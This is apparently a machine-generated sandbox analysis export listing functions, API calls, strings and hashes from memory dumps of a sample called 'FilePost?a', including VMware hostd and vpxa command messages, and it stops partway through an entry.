                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                          • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                          • API String ID: 2565136772-3242537097
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DName::operator+.LIBCMT ref: 6D170E1D
                                          • DName::operator+.LIBCMT ref: 6D170F60
                                            • Part of subcall function 6D16CA50: shared_ptr.LIBCMT ref: 6D16CA6C
                                          • DName::operator+.LIBCMT ref: 6D170FAC
                                          • DName::operator+.LIBCMT ref: 6D170FBB
                                          • DName::operator+.LIBCMT ref: 6D170F0B
                                            • Part of subcall function 6D17262E: DName::operator=.LIBVCRUNTIME ref: 6D1726BD
                                          • DName::operator+.LIBCMT ref: 6D1710E7
                                          • DName::operator=.LIBVCRUNTIME ref: 6D171127
                                          • DName::DName.LIBVCRUNTIME ref: 6D17113F
                                          • DName::operator+.LIBCMT ref: 6D17114E
                                          • DName::operator+.LIBCMT ref: 6D17115A
                                            • Part of subcall function 6D17262E: Replicator::operator[].LIBCMT ref: 6D17266B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
                                          • String ID:
                                          • API String ID: 1026175760-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 6D184B1C
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D185284
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D185296
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D1852A8
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D1852BA
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D1852CC
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D1852DE
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D1852F0
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D185302
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D185314
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D185326
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D185338
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D18534A
                                            • Part of subcall function 6D185267: _free.LIBCMT ref: 6D18535C
                                          • _free.LIBCMT ref: 6D184B11
                                            • Part of subcall function 6D17ACB9: HeapFree.KERNEL32(00000000,00000000,?,6D1799DC), ref: 6D17ACCF
                                            • Part of subcall function 6D17ACB9: GetLastError.KERNEL32(?,?,6D1799DC), ref: 6D17ACE1
                                          • _free.LIBCMT ref: 6D184B33
                                          • _free.LIBCMT ref: 6D184B48
                                          • _free.LIBCMT ref: 6D184B53
                                          • _free.LIBCMT ref: 6D184B75
                                          • _free.LIBCMT ref: 6D184B88
                                          • _free.LIBCMT ref: 6D184B96
                                          • _free.LIBCMT ref: 6D184BA1
                                          • _free.LIBCMT ref: 6D184BD9
                                          • _free.LIBCMT ref: 6D184BE0
                                          • _free.LIBCMT ref: 6D184BFD
                                          • _free.LIBCMT ref: 6D184C15
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Warning.VMWAREBASE(Received GLOBAL command: %s,?), ref: 0034173E
                                            • Part of subcall function 00343B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00343B96
                                          Strings
                                          • failed., xrefs: 003417F8
                                          • Command '%s%s' not authorized for hostd contact, xrefs: 00341778
                                          • Global command %s%s to non-host agent targets not supported, xrefs: 003417AE
                                          • User not authorized for host agent contact, xrefs: 003417BB
                                          • hostd connection to %s%s, xrefs: 00341804
                                          • ha-nfc, xrefs: 00341797
                                          • vmware-hostd, xrefs: 003417E5
                                          • Received GLOBAL command: %s, xrefs: 00341739
                                          • Invalid arguments to '%s', xrefs: 0034174E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          • Associated: 00000003.00000002.4088886858.0000000000340000.00000002.00000001.01000000.00000008.sdmp
                                          • Associated: 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmp
                                          • Associated: 00000003.00000002.4089031269.0000000000352000.00000002.00000001.01000000.00000008.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_340000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Warning
                                          • String ID: failed.$Command '%s%s' not authorized for hostd contact$Global command %s%s to non-host agent targets not supported$Invalid arguments to '%s'$Received GLOBAL command: %s$User not authorized for host agent contact$ha-nfc$hostd connection to %s%s$vmware-hostd
                                          • API String ID: 2415109466-3597576495
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3907804496
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D1897B4: CreateFileW.KERNEL32(00000000,00000000,?,6D189BA4,?,?,00000000,?,6D189BA4,00000000,0000000C), ref: 6D1897D1
                                          • GetLastError.KERNEL32 ref: 6D189C0F
                                          • __dosmaperr.LIBCMT ref: 6D189C16
                                          • GetFileType.KERNEL32(00000000), ref: 6D189C22
                                          • GetLastError.KERNEL32 ref: 6D189C2C
                                          • __dosmaperr.LIBCMT ref: 6D189C35
                                          • CloseHandle.KERNEL32(00000000), ref: 6D189C55
                                          • CloseHandle.KERNEL32(6D181DE0), ref: 6D189DA2
                                          • GetLastError.KERNEL32 ref: 6D189DD4
                                          • __dosmaperr.LIBCMT ref: 6D189DDB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D148C86
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D148CA8
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D148CC8
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D148CEF
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D148D68
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6D148DB4
                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6D148DCE
                                            • Part of subcall function 6D172FF3: _free.LIBCMT ref: 6D173006
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D148E63
                                          • std::_Facet_Register.LIBCPMT ref: 6D148E70
                                            • Part of subcall function 6D1666EC: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D1666F8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister_freestd::invalid_argument::invalid_argument
                                          • String ID: bad locale name
                                          • API String ID: 1536214518-1405518554
                                          • Opcode ID: c99ef5cad7dedb80e4b684875ad5d6e16bfd9ddc03802c6f0b574058fa06d313
                                          • Instruction ID: b8801f6ec26f9f2e84f504151b598279c9658689d0a84cdcaa67680c4821f868
                                          • Opcode Fuzzy Hash: c99ef5cad7dedb80e4b684875ad5d6e16bfd9ddc03802c6f0b574058fa06d313
                                          • Instruction Fuzzy Hash: 4D618BB1D04249DFEB10CFA8D944BAEBBB4BF14314F158159E905AB348E7B4E905CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: operator+shared_ptr$NameName::
                                          • String ID: L 9n$std::nullptr_t$std::nullptr_t $volatile$volatile
                                          • API String ID: 2894330373-938447606
                                          • Opcode ID: 89c0f033bb3f35da54759615a6138dcc3418a2c719962967d0e831ca1721d7ce
                                          • Instruction ID: 4f748efd131bf19eda8b7041baec6e2553fa80433b9a338009df8af5c8a79168
                                          • Opcode Fuzzy Hash: 89c0f033bb3f35da54759615a6138dcc3418a2c719962967d0e831ca1721d7ce
                                          • Instruction Fuzzy Hash: 27615BB580410AEFDB00CFE9C854AEEBBBDFB06344F50865AE4649F250F7329645EB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::Name::operator+shared_ptr
                                          • String ID: 8 9n$8 9n$char $int $long $short $unsigned
                                          • API String ID: 3919194733-213831689
                                          • Opcode ID: 9ca4425b4abe1946c9fed63144fb9a88f759c445c0c716a6c044e75868d08e07
                                          • Instruction ID: 02b23c4fe577b96e0ead6692ad804f97c7cb866bd550f49b6e5df4640f9c54b1
                                          • Opcode Fuzzy Hash: 9ca4425b4abe1946c9fed63144fb9a88f759c445c0c716a6c044e75868d08e07
                                          • Instruction Fuzzy Hash: BC21F5B4900609EFCB00CFE8D595BEEBBB9BB06308F404589D521AB384E7719648EF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: shared_ptr$operator+$Name::operator+Name::operator=
                                          • String ID:
                                          • API String ID: 1464150960-0
                                          • Opcode ID: 4768fed399e28774b80c17a704dc7e9d8e8da035879a34ba2354eaa24ac06724
                                          • Instruction ID: 13ebe400905204eb1c89925838b038c91204926c69bed6dd9ebd9b9f85367dfb
                                          • Opcode Fuzzy Hash: 4768fed399e28774b80c17a704dc7e9d8e8da035879a34ba2354eaa24ac06724
                                          • Instruction Fuzzy Hash: D5E14DB1D0428A9ADB01CFA9C849BFEBBB4EB15304F11C21AD521FA249D7F49715CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _ValidateScopeTableHandlers.LIBCMT ref: 6E3943F4
                                          • __FindPESection.LIBCMT ref: 6E394411
                                          • VirtualQuery.KERNEL32(?,|+uy,0000001C,79752B7C,?,?,?), ref: 6E3944F6
                                          • __FindPESection.LIBCMT ref: 6E394533
                                          • _ValidateScopeTableHandlers.LIBCMT ref: 6E394553
                                          • __FindPESection.LIBCMT ref: 6E39456D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: FindSection$HandlersScopeTableValidate$QueryVirtual
                                          • String ID: d.9n$|+uy$|+uyo
                                          • API String ID: 2529200597-3117658051
                                          • Opcode ID: 02de1dffc38b24eb541fe534f210f3bfb781f8f480e91e1d22873ba7ec3c7dfc
                                          • Instruction ID: 8d1a1b6219e9f32c52ed126ee50ff9f91fafee743f11dcc42420d714f800a253
                                          • Opcode Fuzzy Hash: 02de1dffc38b24eb541fe534f210f3bfb781f8f480e91e1d22873ba7ec3c7dfc
                                          • Instruction Fuzzy Hash: DDA1BCB5E006169FDB14CFD8D9C07AEB7B9EB49314F214629D828A7240F731EC46DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Replicator::operator[].LIBCMT ref: 6D17266B
                                          • DName::operator=.LIBVCRUNTIME ref: 6D1726BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator=Replicator::operator[]
                                          • String ID: @$generic-type-$template-parameter-
                                          • API String ID: 3211817929-1320211309
                                          • Opcode ID: 29ce6d3dfdf9c3a9cdade8ef9a98a8f0e77cd967367d2de881c6335a469b5d7a
                                          • Instruction ID: 77829a7bfff64e3dfa5f337e40302401fe8eeeeff251ad17f4282750d61b6b79
                                          • Opcode Fuzzy Hash: 29ce6d3dfdf9c3a9cdade8ef9a98a8f0e77cd967367d2de881c6335a469b5d7a
                                          • Instruction Fuzzy Hash: 5761D371D0420ADFDB21CFA4D940BFEBBB8AF29310F51401AD615B72A4DBF89546CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • Attempted a typeid of nullptr pointer!, xrefs: 6E397BCE
                                          • Bad read pointer - no RTTI data!, xrefs: 6E397B9A
                                          • Bad dynamic_cast!, xrefs: 6E397B34
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Offset
                                          • String ID: Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                          • API String ID: 1587990502-2941716148
                                          • Opcode ID: 9c114e77050a05805f1ca338abf83d1f0e96c9aff991e8f61740973ca6fbcebb
                                          • Instruction ID: a7a0aec440acd39ccd20d4cd34ac409d5a55628ae86079b7fe058c669c02446e
                                          • Opcode Fuzzy Hash: 9c114e77050a05805f1ca338abf83d1f0e96c9aff991e8f61740973ca6fbcebb
                                          • Instruction Fuzzy Hash: 94319372A04205AFDB04CFE8D945ADE77B8EF45725F208959F910AB6C0F731EA01AB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: operator+$Name::operator+
                                          • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                          • API String ID: 1198235884-2239912363
                                          • Opcode ID: 97ae005b5e15f94f2449ac1a700dc473eca6110e9f398901915efc4f64fae102
                                          • Instruction ID: 8cbe6593dbe4852180f3cd5ed3d3193744633aaf5fc37aef50eb936dbd13b328
                                          • Opcode Fuzzy Hash: 97ae005b5e15f94f2449ac1a700dc473eca6110e9f398901915efc4f64fae102
                                          • Instruction Fuzzy Hash: 1A417BB1C0460AEFDF00CFD8C855BEEBBB9AB01314F548589E514AF280E7769648EF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Warning.VMWAREBASE(received CONNECT_VPXA command: %s,?), ref: 0034183E
                                            • Part of subcall function 00343B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00343B96
                                          Strings
                                          • Command '%s%s' not authorized for vpxa contact, xrefs: 00341878
                                          • received CONNECT_VPXA command: %s, xrefs: 00341839
                                          • vmware-vpxa, xrefs: 003418E5
                                          • Global command %s%s to non-vpxa targets not supported, xrefs: 003418AE
                                          • User not authorized for vpx agent contact, xrefs: 003418BB
                                          • Invalid arguments to '%s', xrefs: 0034184E
                                          • vpxa-nfc, xrefs: 00341897
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          • Associated: 00000003.00000002.4088886858.0000000000340000.00000002.00000001.01000000.00000008.sdmp
                                          • Associated: 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmp
                                          • Associated: 00000003.00000002.4089031269.0000000000352000.00000002.00000001.01000000.00000008.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_340000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Warning
                                          • String ID: Command '%s%s' not authorized for vpxa contact$Global command %s%s to non-vpxa targets not supported$Invalid arguments to '%s'$User not authorized for vpx agent contact$received CONNECT_VPXA command: %s$vmware-vpxa$vpxa-nfc
                                          • API String ID: 2415109466-3576414198
                                          • Opcode ID: 567d9d077d0af31ed0c4943bb90c517987d6cd7dd2e8bb417679cb34b23dab3b
                                          • Instruction ID: 9570880f0b7583ea2fe9e85d8a66f7d22485c7a6bbf99b8be1d5fc923a943cec
                                          • Opcode Fuzzy Hash: 567d9d077d0af31ed0c4943bb90c517987d6cd7dd2e8bb417679cb34b23dab3b
                                          • Instruction Fuzzy Hash: 9711C1377C0B0472EB232689BC07FD63BC9DB41B66F040032F7186D5D2D291B5A092E6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: a886a3f9e7a54116018b070ee1f3b63534dc4af0b33d35dde65dfd15a4d08f23
                                          • Instruction ID: 5ea82fb2139be06adb1273da82b5807046ae54ce5b5d0417efe98f35f13fe370
                                          • Opcode Fuzzy Hash: a886a3f9e7a54116018b070ee1f3b63534dc4af0b33d35dde65dfd15a4d08f23
                                          • Instruction Fuzzy Hash: 3B219576904108FFCB51DFA5E880DDE7BB9BF08244F0141A6F6199B235EB72EA44DB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
